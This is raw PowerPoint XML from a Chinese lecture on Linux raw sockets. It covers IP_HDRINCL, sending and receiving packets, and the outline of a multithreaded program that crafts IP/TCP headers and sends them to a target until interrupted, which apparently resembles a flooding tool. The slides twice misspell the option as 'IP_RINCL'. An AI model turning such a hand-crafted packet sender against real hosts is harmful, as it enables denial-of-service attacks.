              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部数据部分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）填写完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部后需要填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）最后填写发送目的地址并发送出去。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）头文件、一些函数定义和一些宏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）主函数部分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的类型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）判断输入的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址和目的端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）设置原始套接字，并设置选项为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>选项。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）建立多个线程进行协同处理，然后等待用户发送的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SIGINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>信号，所有线程退出后结束程序。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177173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13.2.2  IP_HDRINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>套接字选项</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使用套接字选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP_HDRINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>设置套接字，在之后进行的接收和发送时，接收到的数据包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的头部。用户之后需要对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>层相关的数据段进行处理，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部数据的设置和分析，校验和的计算等。设置方法如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>int set = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if(setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, &amp;set, sizeof(set))&lt;0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>){         /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-25000" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>错误处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-25000" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7010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13.2.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>不需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>bind()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>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原始套接字不需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bind()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数，因为进行发送和接收数据的时候可以指定要发送和接收的目的地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>。当系统对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>进行绑定的时候，发送和接收的函数可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>send()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>recv()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>等不需要指定目的地址的函数。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388309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13.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>原始套接字发送报文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>原始套接字发送报文有如下原则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>通常情况下可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sendto()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数并指定发送目的地址来发送数据，当已经指定了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bind()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>目标地址的时候可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>send()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>发送数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>如果使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>setsockopt()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>设置了选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP_RINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，则发送的数据缓冲区指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部第一个字节的头部，用户发送的数据包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部之后的所有数据，需要用户自己填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部和计算校验和并需要对所包含数据进行处理和计算。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>如果没有设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP_RINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，则发送缓冲区指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部后面数据区域的第一个字节，不需要用户填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部的填写工作由内核进行，内核还进行校验和的计算。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3096947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黑体"/>
              </a:rPr>
              <a:t>13.4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>原始套接字接收报文</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与发送报文类似，接收报文也有相似的规则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
